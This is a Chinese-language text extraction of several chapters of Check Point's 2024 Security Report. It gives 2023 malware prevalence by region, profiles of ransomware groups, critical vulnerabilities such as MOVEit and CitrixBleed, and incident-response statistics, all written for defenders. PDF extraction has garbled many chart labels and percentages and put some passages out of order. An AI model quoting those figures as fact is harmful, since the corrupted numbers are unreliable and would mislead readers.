PyPI 注册表定制的恶意软件。这种恶意软件可以让攻击者毫无征兆地轻松发起恶意攻击。恶意软件包在开源软件存储库中的传播日益引发担忧,需要开发人员和用户高度关注并采取积极措施。虽然开源软件的优势毋庸置疑,但诸如误植域名、品PyPi 和 NPM 等软件存储库面临的恶意攻击激增,仅 2023 年第一季度就已发现 6800 起攻击。威胁包括误植域名、品牌劫持和依赖项混淆,表明需要实施增强型安全协议和全面代码审查实践来保障用户安全。ORI ABRAMOVSKYCheck Point Software Technologies 数据科学主管第第 3 3 章章46CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告40全局分析第第 4 4 章章47CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告全球全球美洲美洲不同地区网络攻击类别不同地区网络攻击类别图 3:2023 年全球受影响组织所占的百分比(按恶意软件类型)。图 4:2023 年美洲受影响组织所占的百分比(按恶意软件类型)。多用途恶意软件信息窃取程序勒索软件加密货币挖矿软件移动终端31%9%6%多用途恶意软件信息窃取程序勒索软件加密货币挖矿软件移动终端27%9%9%8%7%第第 4 4 章章48CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告不同地区网络攻击类别不同地区网络攻击类别欧洲、中东和非洲欧洲、中东和非洲亚太地区亚太地区图 5:2023 年欧洲、中东和非洲受影响组织所占的百分比(按恶意软件类型)。图 6:2023 年亚太地区受影响组织所占的百分比(按恶意软件类型)。多用途恶意软件信息窃取程序勒索软件加密货币挖矿软件移动终端32%8%5%多用途恶意软件信息窃取程序勒索软件加密货币挖矿软件移动终端35%8%第第 4 4 章章49CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告全球威胁指数地图全球威胁指数地图图 7:全球威胁指数地图以下全球网络威胁风险指数地图显示了全球主要风险区域。*颜色越深=风险越高*灰色=数据不足第第 4 4 章章50CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告教育/科研政府/军队医疗保健通信ISP/MSP金融/银行公用事业零售/批发娱乐/酒店制造业顾问SI/VAR/分销商交通保险/法律软件供应商硬件供应商2046(-12%)1598150014931286116211111062956919837802748740652506(-4%)( 3%)( 8%)(-6%)( 3%)( 1%)( 22%)( 1%)(-3%)( 21%)(-11%)(-0.3%)(-23%)(-13%)( 13%)图 8:2023 年按行业划分每个组织每周遭受的攻击次数全球平均值 与 2022 年相比的变化幅度%。教育、政府和医疗行业仍然是网络攻击的主要目标。由于公众意识在过去几年中有所提高,加上发生了大量有影响力的攻击事件,教育行业对其安全协议进行了大幅升级,可能得益于此,近期针对教育行业的攻击事件数量略有下降。但平均而言,教育机构每周仍会遭受 2000 多次攻击。有些攻击是大型活动的一部分,例如针对约翰-霍普金斯大学和佐治亚大学系统的攻击,CL0P 勒索软件通过 MOVEit 托管文件传输软件入侵了这两所高校。第第 4 4 章章51CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告学校尤其容易受到网络攻击,因为它们的系统中存在大量敏感个人信息,网络安全方面也并未投入足够的资金。与公共部门相比,私营部门(包括零售、批发、制造和金融机构)组织更有可能屈从于赎金要求,遭受的攻击数量也较上一年度有所增加。这些机构的访问权限常常成为地下市场中交易的商品。2023 年,网络安全形势令人担忧,各行各业遭受的勒索软件攻击激增。勒索软件攻击目前在 Check Point 侦测网络所检测到的各类恶意软件中占到 10%的比例。CPIRT(Check Point 事件响应团队)给出的数据以及在勒索软件“羞辱性网站”发布受害者进一步凸显了这一趋势。根据 CPIRT 的数据,他们处理的所有事件中,有近半数涉及勒索软件,报告的勒索软件受害者数量已达到近 5000 人,明显多于 2022 年报告的 2600 人。图 9:地下论坛上的零售公司访问权限出售帖。第第 4 4 章章52CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 10:传输协议 电子邮件与 Web 攻击向量(2018-2023 年)。电子邮件 WEB2019646 1833g 2083 2184 2286 2388%第第 4 4 章章53CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告主要恶意文件类型:主要恶意文件类型:WEB VS WEB VS 电子邮件电子邮件图 11:Web 2023 年主要恶意文件类型。图 12:电子邮件 2023 年主要恶意文件类型。exeshpdfpydlljarmsips1doc*vbs56%8%7%4%2%1%1%1%1%htmlpdfexelnkdoc*jsxls*jarrtfmsi69 %3%2%1%1%1%1%1%0.1%xls*包括.xls、.xlsx、.xlsm 等常见 Office Excel 文件doc*包括.doc、.docx、docm 和.dot 等常见 Office Word 文件第第 4 4 章章54CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告rarzip7zgzimgzcabisoarjxz35%9%8%5%4%3%2%2%2%图 13:2023 年通过电子邮件传递的主要恶意存档文件类型。基于电子邮件的攻击仍然是主要的初始感染向量。88%的恶意文件是通过电子邮件发送,其余则直接从互联网下载。威胁执行者已适应电子邮件防护策略,并且还在探索创新的传播技术。在 Microsoft 对以 Web 标记(MotW)表示的外部源文件中的 Office VBA 宏进行限制后,恶意 Office 文件的热门程度急剧下降,从 2022 年的近 50%降至 2023 年的 2%。值得注意的其他攻击向量包括 HTML 文件和各种存档文件类型,其中对 HTML 文件的利用尤其显著增加,HTML 文件占到所有恶意文件附件的 69%。威胁执行者以多种方式使用 HTML 文件,将它们用于在网络钓鱼计划中模仿合法网站登录页面并窃取用户凭据。这些文件中可能包括恶意 JavaScript 或针对未修补浏览器和浏览器插件的漏洞。CP 最近的研究表明,这些策略的使用者并不局限于低级别犯罪分子,还包括高级 APT 执行者。HTML 的其他用途包括 HTML 走私、自动下载可执行文件以及重定向到其他恶意 URL。通过电子邮件传递 HTML 的合法用例并不常见,因此组织应考虑实施限制。第第 4 4 章章55CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告各种存档文件的使用也呈上升趋势。许多安全服务都无法看到受密码保护的存档内容,由此形成了有效攻击向量。其他格式(例如.img 和.iso)依赖其提取软件来传播 MotW 功能,借此阻止恶意攻击。虽然 Microsoft 已修复此功能,但 7-zip 等其他提供商却采取选择性加入策略,导致 MotW 保护机制的有效性降低。恶意.py 文件的检出率有所上升,在最常见的网络传播恶意文件类型中排名第四,表明恶意代码包的使用率正在增加。我们将在另一章节中详细探讨这一趋势。使用可执行文件作为恶意电子邮件附件的比例继续下降,从 2022 年的 26%降至上一年度的仅 3%,原因可以归结为企业采取限制性策略、Google 和 Microsoft 等主流电子邮件服务提供商整合安全机制以及用户意识有所增强。第第 4 4 章章56CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 14:2023 年全球最流行的恶意软件图 15:2023 年美洲最流行的恶意软件FakeUpdatesQbotAgentTeslaFormBookCloudEyEXMRigEmotetNanocoreLokiBotRemcos11%9%8%7%5%4%4%4%4%3%全球全球FakeUpdatesQbotAgentTeslaFormBookEmotetCloudEyEXMRigNanocoreNJRatRemcos10%8%4%4%3%3%3%3%3%2%美洲美洲主要恶意软件系列全球恶意软件统计信息全球恶意软件统计信息以下章节列出的数据比较是基于 Check Point Threat Cloud 2023 年 1 月至 12 月的数据。我们将在下方说明各地区 2023 年最流行的恶意软件,以及受每种恶意软件系列影响的企业网络的百分比。第第 4 4 章章57CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 16:2023 年欧洲、中东和非洲最流行的恶意软件欧洲、中东和非洲欧洲、中东和非洲(EMEA)(EMEA)图 17:2023 年亚太地区最流行的恶意软件亚太地区亚太地区(APAC)(APAC)FakeUpdatesQbotFormBookAgentTeslaCloudEyENanocoreEmotetLokiBotXMRigRemcos11%9%9%8%6%5%4%4%4%4%AgentTeslaFakeUpdatesFormBookQbotXMRigCloudEyELokiBotNJRatRemcosNanocore12%9%9%7%7%6%5%5%5%第第 4 4 章章58CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告主要恶意软件全局分析主要恶意软件全局分析在 Check Point 列出的 2023 年全球最流行恶意软件名单中,排名第一的是名为 FakeUpdates 的恶意软件(也称为 SocGholish),其依靠入侵后的网站网络将用户重定向至虚假的软件和浏览器更新。这些虚假更新接着会诱骗用户下载并执行充当初始接入点的 JavaScript 下载器,从而通过 GootLoader、NetSupport 和 DoppelPaymer 等其他恶意软件实施进一步攻击。遭入侵的网站网络与 TA569 相关,后者是充当初始访问代理(IAB)的高产威胁执行者。TA569 涉嫌以按安装付费(PPI)的定价模式向其他网络犯罪分子出售恶意软件受害者的初始访问权限,这些网络犯罪分子随后可利用已遭入侵的系统来部署勒索软件。感染链从受害者访问遭入侵网站开始,无论受害者是受网络钓鱼邮件诱骗还是直接访问该网站。受害者可能会在该网站上看到虚假的浏览器更新请求、虚假的验证码拼图和安全软件更新,之后会遭到恶意软件感染。Qbot(又称 QakBot 或 PinkslipBot)在我们的列表中排名第二。Qbot 是一种 Windows 恶意软件,最早于 2008 年作为银行木马程序被发现。经过多次更新和演进,它已成为最广为人知、存在时间最长的恶意软件植入程序之一。从事实来看,Qbot 通过窃取数据和实施勒索造成了巨大破坏,FBI 和美国司法部为此在 2023 年 8 月发起的国际行动中摧毁了该僵尸网络,将其从受感染的服务器上清除,并没收了 800 多万美元的非法利润。12 月,研究人员又在新的网络钓鱼活动中观察到 Qbot 的行踪。Emotet 在 Check Point 的最流行恶意软件榜单上盘踞已久。尽管运作模式已趋弱化,但它仍然影响了全球 4%的企业网络,主要集中在本年度第一季度。Emotet 于 2021 年 11 月在由欧洲刑警组织牵头的全球行动中遭到取缔,但之后又在网络犯罪组织 Mealybug(又名 TA542)的蓄意策划下,通过多次垃圾邮件活动与长时间静默交替的方式于 2022 年谨慎回归。由于 Microsoft 对利用下载文档中的 VBA 宏(Emotet 活动中使用的主要方法)加以限制,Mealybug 随后继续探索其他感染方法。2023 年,Mealybug 被观察到在尝试多种不同技术,并于 3 月开始在其活动中使用嵌入 VBScript 的 OneNote 文件。受害者在下载文件后会被诱骗点击“查看”按钮查看文档内容,然后下载 Emotet DLL。按照计划,这一活动与美国报税季截止日期相吻合。第第 4 4 章章59CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告23%8%4%3#%9%5%4%3!%8%4DkeUpdatesQbotEmotetUrsnifMiraiPhorpiex其他FakeUpdatesQbotRamnitEmotetDarkGatePhorpiex其他3%3%6%6%5H%3keUpdatesQbotEmotetMiraiUrsnifRamnit其他FakeUpdatesQbotEmotetMiraiGluptebaRaspberry Robin其他408%5%图 18:2023 年全球最流行的多用途恶意软件图 20:2023 年欧洲、中东和非洲最流行的多用途恶意软件全球全球图 19:2023 年美洲最流行的多用途恶意软件图 21:2023 年亚太地区最流行的多用途恶意软件美洲美洲欧洲、中东和非洲欧洲、中东和非洲(EMEA)(EMEA)亚太地区亚太地区(APAC)(APAC)主要多用途恶意软件主要多用途恶意软件第第 4 4 章章60CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告多用途恶意软件全局分析多用途恶意软件全局分析与之前的报告一样,我们合并了银行木马程序和僵尸网络这两个恶意软件类别,并引入名为“多用途恶意软件”的新统一类别。这一改动反映了许多银行木马程序的演变,即,它们已加入更多新功能。除了上一节讨论的 FakeUpdates、Qbot 和 Emotet 之外,DarkGate(一种在 Delphi 中开发的 Windows RAT)的热度也日渐上升,在针对亚太地区实体的活动中,表现尤其突出。2023 年下半年,DarkGate 因其躲避安全系统检测的能力而招来大量声讨。Emotet 和 Qbot 会在执行自己的感染活动后出售访问权限和感染设备,相比之下,DarkGate 则采取更加直接的销售策略,以恶意软件即服务(MaaS)模式进行运作。该恶意软件直接在地下论坛向特定客户群投放广告,重点宣传其新功能,并声称数量有限、欲购从速。传播 DarkGate 的活动由众多执行者实施,利用了包括网络钓鱼和 Teams 消息在内的多种技术。图 22:2023 年地下论坛上的 DarkGate 开价和出价。第第 4 4 章章61CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告20%8%5%4!%4%3 %57%FormBookAgentTeslaLokiBotVidarRaccoonRamnit其他AgentTeslaFormBookLokiBotRamnitRaccoonVidar其他5%5%8%63%4%AgentTeslaFormBookLokiBotRaccoonRamnitVidar其他AgentTeslaFormBookLokiBotVidarRaccoonRamnit其他40#%4%图 23:2023 年全球主要信息窃取恶意软件图 25:2023 年欧洲、中东和非洲主要信息窃取恶意软件图 24:2023 年美洲主要信息窃取恶意软件图 26:2023 年亚太地区主要信息窃取恶意软件全球全球美洲美洲欧洲、中东和非洲欧洲、中东和非洲(EMEA)(EMEA)亚太地区亚太地区(APAC)(APAC)主要信息窃取恶意软件主要信息窃取恶意软件第第 4 4 章章62CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告信息窃取恶意软件全局分析信息窃取恶意软件全局分析 信息窃取恶意软件市场主要以恶意软件即服务(MaaS)模式运作,涉及多个关键角色。这一生态系统的核心是 MaaS 提供商,他们主要负责开发和维护恶意软件及其运行基础设施。信息窃取程序的操纵者以租用或购买方式取得恶意软件,将其部署到针对受害者平台的网络攻击活动中。地下市场在此扮演关键角色,用于交易从这些活动中获取的数据。过去一年中,该生态系统仅有细微变化,AgentTesla、FormBook 和 LokiBot 等恶意软件继续横行。这些信息窃取程序的热门程度从地下论坛的定价中可见一斑,每月订阅费用从 60 美元到 1000 美元不等。这种分层定价结构可以满足从新手到老练黑客等各类威胁执行者的需求。此外,还存在初始访问代理,他们利用购买的数据来入侵网络,通常会导致大量勒索软件攻击。AgentTesla 于 2014 年首次发现,是一种具有键盘记录功能的 MaaS,也是 CP 经常检测到的信息窃取程序之一。其当前版本已进行过强化,可以窃取多种应用程序的凭据,包括 Web 浏览器、VPN 软件、FTP 服务和电子邮件客户端。除了窃取凭据,AgentTesla 还具有收集系统信息、禁用反恶意软件进程和捕获剪贴板内容的功能。AgentTesla 擅长从系统注册表和配置文件中提取凭据,并将窃取到的数据传输至其命令和控制(C&C)服务器。值得注意的是,这种恶意软件通过低成本订阅模式在地下论坛出售,使得技术专业知识有限的网络犯罪分子也能对其加以利用。第第 4 4 章章63CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告75%1%1i%8%5%2%1e%8%8%3%XMRigRubyMinerLemonDuckLuciferWannamine其他XMRigLemonDuckLuciferWannamineRubyMiner其他4%4U%9%7%XMRigRubyMinerLemonDuckLuciferWannamine其他XMRigRubyMinerLemonDuckWannamineLucifer其他6%6%图 27:2023 年全球主要加密货币挖掘恶意软件图 29:2023 年欧洲、中东和非洲主要加密货币挖掘恶意软件图 28:2023 年美洲主要加密货币挖掘恶意软件图 30:2023 年亚太地区主要加密货币挖掘恶意软件全球全球美洲美洲欧洲、中东和非洲欧洲、中东和非洲(EMEA)(EMEA)亚太地区亚太地区(APAC)(APAC)主要加密货币挖掘恶意软件主要加密货币挖掘恶意软件第第 4 4 章章64CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告 加密货币挖矿软件全局分析加密货币挖矿软件全局分析由于比特币汇率并未反弹到 2021 年的峰值,加之挖掘难度持续增加,非法加密货币挖掘在 2023 年有所减少。2023 年,全球只有 9%的企业实体受到加密货币挖掘的影响,2022 年这一比例则为 16%。随着 GPU(图形处理单元)价格上涨,一些威胁执行者现在专门瞄准图形设计师和工程平台,利用其增强的 GPU 功能作为挖掘程序。Monero 挖掘仍然利润丰厚,其常用开源挖掘工具 XMRig 在 2023 年被用于 65%的加密货币挖掘攻击。加密货币挖掘程序正在整合更多恶意功能,将其中一些功能(例如 LemonDuck)转变为加密货币挖掘核心功能之上的多层面威胁。在某些情况下,比如对于 StripedFly 恶意软件,加密货币挖掘活动可能只是为更复杂的间谍活动做掩护。云基础设施仍然是加密货币挖掘攻击的目标。10 月,研究人员报告称,一项长达数年的行动利用安全性较差的 IAM 密钥访问云环境来部署 Monero 挖掘程序。通常情况下,威胁执行者安装加密货币挖掘程序时所用的访问权限随后会被用于其他漏洞利用和入侵活动。这也让加密货币挖掘程序的存在成为更广泛安全问题的潜在先兆。第第 4 4 章章65CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告26%9%3%5%4%8%7%4%8%9%AnubisAhMythHiddadHydraJokerCerberus其他AhMythJokerAnubisHiddadCerberusHydra其他5%8%2%6%3%AnubisAhMythPandoraJokerHiddadHydra其他PandoraAhMythAnubisHiddadJokerCerberus其他12%88B4F!%图 31:2023 年全球主要移动终端恶意软件。图 33:2023 年欧洲、中东和非洲主要移动终端恶意软件。图 32:2023 年美洲主要移动终端恶意软件。图 34:2023 年亚太地区主要移动终端恶意软件。全球全球美洲美洲欧洲、中东和非洲欧洲、中东和非洲(EMEA)(EMEA)亚太地区亚太地区(APAC)(APAC)主要移动终端恶意软件主要移动终端恶意软件第第 4 4 章章66CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告 移动终端恶意软件全局分析移动终端恶意软件全局分析 移动设备是网络攻击的主要目标,很大程度上是因为它们在我们日常生活中扮演着核心角色,并且包含大量有价值的数据。这些设备不仅能够存储个人和财务信息,还可作为有效的监控工具,因为它们具有位置跟踪、音频录制和图像采集功能。AhMyth Android 远程访问木马程序(RAT)是一种在 GitHub 上免费提供的开源恶意软件,经常被用作攻击活动的基础。它不出意料地在 Check Point 主要移动终端恶意软件排行榜上占据重要位置。研究人员在名为“iRecorderScreen Recorder”的武器化应用程序中发现了这种恶意软件的变体之一 AhRat,该应用程序可在 Google Play 商店下载,下载量已逾 5 万次。该应用程序的“干净”版本自 2021 年起即面向 Android 用户提供,后来才在其中添加了恶意特征。除了 iRecorder 一目了然的屏幕抓取功能以外,其恶意更新还包括录音和数据泄露功能,并且可对已保存的网页、图像、音频、视频、文档和存档格式进行检索。间谍软件功能可能暗示其与网络间谍活动有关,这在移动终端恶意软件领域并不鲜见,相关的例子包括专门针对巴基斯坦乌尔都语受害者的 Kamran Android 恶意软件,以及由与中国大陆相关的 APT 组织操纵的 BadBazaar Android 间谍软件。与往常一样,这些类型的恶意软件也经常被网络犯罪分子用来获取经济利益。例如,新出现的 Chameleon Android 银行木马程序以澳大利亚和欧洲用户的移动银行和加密货币应用程序为目标。在印度也发现了类似的活动,攻击者通过社交媒体平台传播冒充银行和政府服务的恶意应用程序。勒索软件在 Android 生态系统中也被赋予新含义:SpyLoan 应用程序通过 Google Play 商店传播至亚洲、非洲和南美洲超过 1200 万用户。该恶意软件从受害者的移动设备中收集他们的个人和财务数据,利用这些数据对其进行骚扰和勒索,趁机大敲竹杠。第第 4 4 章章67CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 35:2023 年羞辱性网站上最活跃的勒索软件执行者(按受害者人数)。主要双重敲诈勒索软件执行者主要双重敲诈勒索软件执行者2023 年,共有 68 个活跃的勒索软件组织报告称其已入侵 5000 多名受害者的系统并公开实施勒索,这一数字较往年大幅增加。随着时间的推移,勒索软件事件在 2023 年愈演愈烈。下半年记录的受害者超过 2800 人,上半年则有 2200 人。Lockbit 在此期间最为活跃,占报告事件的 21%,涉及逾 1050 起案件。通常情况下,威胁执行者会为受害者留出一到两周的宽限期来满足赎金要求。支付赎金的受害者不会被公开曝光,这表明受害者的实际数量可能要高得多。本节包含来自双重敲诈勒索软件组织操纵的近 200 个勒索软件“羞辱性网站”的信息,其中的 68 个网站上发布了 2023 年以来受害者的姓名和信息。网络犯罪分子利用这些网站向那些并未立即支付赎金的受害者施加压力。来自这些羞辱性网站的数据有其自身偏向,但仍能提供有价值的见解,帮助我们了解勒索软件生态系统这一企业目前面临的头号风险。下文的数据收集时间为 2023 年 1 月至 12 月期间。勒索软件勒索软件21%5%5%7%6%9%LockbitALPHVCL0PPlay8baseBianlianAkiraMalasLockerNoescapeBlackbasta其他34%4%3%3%3%第第 4 4 章章68CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告美国英国加拿大德国意大利法国澳大利亚西班牙巴西印度俄罗斯1%2%2%2%2%3%4%4%4%7E%CL0P 的活动并未充分反映在此次统计中。6 月初,CL0P 利用零日漏洞取得了 MOVEit 文件传输软件的访问权限,导致逾 2600 家组织受到攻击。大多数受害者的身份并未在 CL0P 的羞辱性网站上被披露,因而没有包含在上述统计当中。CL0P 利用其他方法进一步对受害者实施勒索。CL0P 本年度的零日漏洞使用场景还包括对 GoAnywhere 的攻击,本报告将在另一部分对此进行详细介绍。ALPHV(也称为 BlackCat)在 2023 年攻击了超过 440 名受害者,也是执法行动重点打击的对象。12 月,由美国牵头开展的一次行动导致该组织关闭网站并发布解密工具。根据 CISA 的报告,该组织自开始运营以来已攻击了超过 1000 名受害者,收到的赎金总额高达近 3 亿美元。在这次行动过后,该组织继续从事犯罪活动并继续在暗网上作恶。图 36:2023 年羞辱性网站上报告的受害者人数(按国家/地区)。第第 4 4 章章69CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告制造业零售/批发顾问医疗保健教育/科研软件供应商保险/法律金融/银行交通/物流政府/军队娱乐/酒店通信ISP/MSP/IT能源/公用事业0510152022%9%8%7%6%6%6%5%4%3%3%3%2%一番光景。制造业和零售业的受害者数量最多,而政府和教育实体处在较低攻击量级。仅在 2023 年 12 月,可口可乐新加坡公司(DragonForce)、日产汽车澳大利亚公司(Akira)、卡夫亨氏公司(Snatch)、施乐公司(Inc ransom)等知名企业相继成为双重敲诈勒索软件组织的受害者。造成上述差异的原因可能是这些行业满足赎金要求的意愿不同,教育和政府组织通常不太愿意支付赎金。瞄准这些部门主要是为了利用他们的数据,包括个人和技术信息,而非实施基于勒索的攻击。从地域分布来看,受影响的公司有 45%位于美国,其次是英国,占 7%,加拿大、德国和意大利则各 占 4%。2023 年上图中存在俄罗斯受害者,这主要 可归咎于两个执行者:MalasLocker 和 Werewolves。针对前苏联实体的网络攻击仍然相对较少。MalasLocker 活跃于 2023 年上半年,采用了非常规的方法,将传统的勒索软件要求改为慈善捐款请求。在分析受勒索软件攻击影响的行业部门时,Check Point Threat Cloud 的数据表明,首当其冲的是教育、政府和医疗行业。勒索软件受害者方面则是另外图 37:2023 年羞辱性网站上报告的勒索软件受害者的行业分布情况。第第 4 4 章章70CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告50引人注目的 全球性漏洞第第 5 5 章章71CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告下方的主要漏洞列表以 Check Point 入侵防护系统(IPS)侦测网络收集的数据为依据,并详细介绍了 2023 年 CP 发现的一些最流行和令人关注的攻击技术及漏洞攻击。PAPERCUT(CVE-2023-27350)PAPERCUT(CVE-2023-27350)该漏洞为超危 RCE(远程代码执行)漏洞,CVSS 评分为 9.8,存在于用户数量超过 1 亿的打印管理软件 PaperCut 中。该漏洞随 2023 年 3 月发布的补丁一起披露,可能导致敏感信息暴露以及整个网络被攻破。该漏洞在披露之后很快被各种恶意执行者利用,包括用于传播 Lockbit 和 CL0P 勒索软件。一些政府支持的 APT 组织也利用了这一漏洞。Check Point 数据显示,2023 年有 9%的组织受到该漏洞影响。MOVEIT(CVE-2023-34362)MOVEIT(CVE-2023-34362)该漏洞为超危 SQL 注入漏洞,存在于 MOVEit MFT(托管文件传输软件)中,在 2023 年最高产的勒索软件活动中遭到利用,影响了全球 2700 多家组织。该漏洞在公开披露之前已被 CL0P 勒索软件组织利用,他们部署了名为 LEMURLOOT 的 Web shell,之后将其用于从 MOVEit Transfer 数据库窃取数据。由于受害者众多,数据体量庞大,CL0P 改变了勒索技术,不再对窃取的数据进行加密以及将其发布在 Torrents 上,而是依靠数据实施勒索。Check Point 数据显示,2023 年有 7%的组织受到该漏洞影响。GOANYWHERE(CVE-2023-0669)GOANYWHERE(CVE-2023-0669)该漏洞为超危 RCE 漏洞,存在于 GoAnywhere MFT 软件(托管文件传输)中,披露时间为 2023 年 2 月。该漏洞在披露之前已被 CL0P 勒索软件团伙大肆利用,导致 130 多家机构发生重大数据泄露。这一事件表明勒索软件操纵者利用零日漏洞实施的攻击呈现不断增长的趋势。Check Point 数据显示,2023 年有 2.5%的组织受到该漏洞影响。第第 5 5 章章72CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告BARRACUDA(CVE-2023-2868)BARRACUDA(CVE-2023-2868)该漏洞为超危远程命令注入漏洞,被发现存在于 Barracuda 电子邮件安全网关(ESG)设备中,可通过恶意文件附件进行利用。该漏洞早在 2022 年 10 月就被中国大陆 APT 执行者积极利用,其攻击活动对全球范围内多家组织造成了影响,政府机构尤甚。在相关方发布补丁并采取遏制措施后,攻击者调整了他们的技术,修改了他们的恶意软件,并采用额外的持久化机制来维持访问。因此,Barracuda 和 FBI 都建议客户立即更换受到攻击的 ESG 设备。MICROSOFT OUTLOOK(CVE-2023-23397)MICROSOFT OUTLOOK(CVE-2023-23397)该漏洞为超危权限升级漏洞,存在于 Microsoft Outlook 中,于 2023 年 3 月发现,CVSS 评分为 9.8。该漏洞使攻击者能够通过经特殊设计的电子邮件来劫持用户的身份验证哈希值。该漏洞被众多组织积极利用,其中包括与俄罗斯有关的 APT28 组织。CITRIXBLEED(CVE-2023-4966)CITRIXBLEED(CVE-2023-4966)该漏洞为存在于 Citrix NetScaler 平台中的超危漏洞,允许未经身份验证的远程攻击者提取包括会话令牌在内的系统内存数据。攻击者随后使用这些数据来劫持合法会话,从而绕过密码和 MFA 程序。CitrixBleed 易于使用,并且可参考概念验证的利用场景,因而被包括 LockBit、Medusa 和 Akira 在内的多个勒索软件组织广泛利用。第第 5 5 章章73CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 38:2023 年披露的漏洞利用攻击百分比。20232022202120202019201820172016201520142013更早0369126%7%6%6%6%9%8%3 23 年,网络威胁格局发生明显变化,新披露的漏洞被攻击者迅速利用。数据显示,2023 年和 2022 年报告的漏洞分别占所有利用尝试的 6%和 14%。这表明最近的漏洞更加严重并且易于利用,能够以远快于其他漏洞的速度由威胁执行者采用并予以武器化。相比之下,2021 年至 2023 年期间披露的相对较新的漏洞占利用尝试的 30%以上,显著高于 2021 年观察到的 2019 年至 2021 年期间所披露漏洞的比例(仅 17%)。这一趋势表明,利用较旧的未修补漏洞可以摆脱先前对于延迟更新做法的依赖,前几年出现的“长尾”分发模式就证明了这一点。第第 5 5 章章74CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告各各 TLD TLD(顶级域名)的恶意基础设施(顶级域名)的恶意基础设施 本节重点介绍通过 Check Point 的 ThreatCloud AI 在 2023 年观察到的最常用的恶意顶级域名(TLD)。无论是用于伪装网络钓鱼站点,还是用作主要僵尸网络的命令和控制(C&C)中心,域名都是威胁执行者基础设施中的关键组成部分。了解与各种 TLD 相关的趋势可为防御者提供另一种用来评估潜在风险的工具。有几个因素可能会影响威胁执行者对特定 TLD 的偏好,包括他们打算冒充的目标组织、他们首选的域名注册商是否可以使用 TLD,以及与获取 TLD 相关的成本。新的恶意.RU 域名显著增加始于 2022 年初,在俄乌冲突爆发伊始占新的恶意域名的将近 40%,之后又恢复至冲突前的水平,现在平均每月注册的新恶意域名只有不到 3%。在局势紧张时期,.RU 域名在所有恶意 TLD 中一直居于三、四名位置。具有俄罗斯政府背景的 Gamaredon APT 组织是恶意.RU 域名的高频用户,因近年来通过 REG.RU 注册商进行了数百个域名的注册而为人所知。图 39:2022-2023 年每月新的恶意域名百分比(按 TLD)。4550% %5%0%第第 5 5 章章75CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告60CHECK POINT 事件响应团队(CPIRT)相关见解第第 6 6 章章76CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告3 %6%3%勒索软件安全警报行为异常可疑电子邮件DDoSCERT 警报欺诈交易其他30%本节内容基于大量 CPIRT 分析和缓解案例的经验和数据,并不局限于 Check Point 产品用户。CPIRT 通常在恶意活动明确显现后介入,例如文件被勒索软件加密、发现电子邮件泄露或检测到未经授权的恶意软件文件或进程。团队会对初始威胁指标或“触发因素”进行分析,从不同角度了解威胁形势。在客户环境中发出 EDR 安全警报后,我们联系了事件响应团队。臭名昭著的凭据窃取工具 Mimikatz 被 EDR 系统当场抓获并拦截。这种异常活动立即引起了人们的关注,表明确实存在敌对分子,他们正试图以不引人注意的方式操纵网络。客户意识到情况可能非常严重,于是向 CPIRT 寻求帮助。了解事件触发因素我们将事件触发因素定义为发生入侵时促使客户寻求事件响应服务的初次提示。勒索软件是最为突出的主要因素,约占所有事件触发因素的 30%。勒索软件攻击通常引人瞩目并且破坏力巨大,需要立即采取行动。图 40:2023 年 CPIRT 案例分类(按不同事件触发因素)。第第 6 6 章章77CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告2023 年有 20%的 CIPRT 案例是由客户环境中的安全产品发出的警报所触发。这些通常是严重性级别最高的警报,而严重性级别较低的警报通常不需要作出同等响应。值得关注的是,事件响应(IR)团队参与处理的事件有 13%是由行为异常引发,包括普通用户观察到的偏离既定模式的任何异常活动。如此高的比例反映了它们作为潜在严重安全问题的危险信号具有十分重要的意义。不过也请务必注意,行为异常报告往往不够可靠,并且还可能导致误报。在上图中,可疑电子邮件类别是指任何可疑的入站或出站电子邮件活动。应当高度关注可疑的出站电子邮件,因为它们通常表明组织中存在电子邮件泄露情形。如果未能及时发现,这些事件可能会导致未经授权的资金转移,这是另一个常见的事件响应触发因素,在 2023 年的案例中占到 3%的比例。频率相对较低但仍然很重要的事件触发因素包括 CERT 警报和暗网监控,前者是由当地 CERT 针对入侵提供的初始提示,后者则是在地下论坛发现有关入侵的信息或购买初始访问权限的出价后发出的初始警报。尽管这些触发因素的出现几率较低,但它们往往表明存在复杂且严重的威胁,如果不及时处理,可能酿成大患。随着我们对事件展开深入调查,情况变得复杂起来。我们发现了数据外泄的迹象,同时在 Active Directory 服务器上发现了 RAT(远程访问工具)和加密二进制文件。这些元素已准备妥当,可用于在网络上进行大规模部署,这是勒索软件攻击的明确前兆,预示着攻击将在几分钟后发动。主要攻击类型“主要攻击”指的是攻击类别,而非触发调查的指标。对主要攻击类型的分析表明,勒索软件是最为常见的威胁类型,占事件响应案例的 46%。商业电子邮件攻击(BEC)在案例中的占比为 19%,这些攻击通过可疑电子邮件活动或欺诈性转账等指标检测得出。2023 年,目的在于窃取特定用户身份的攻击(例如 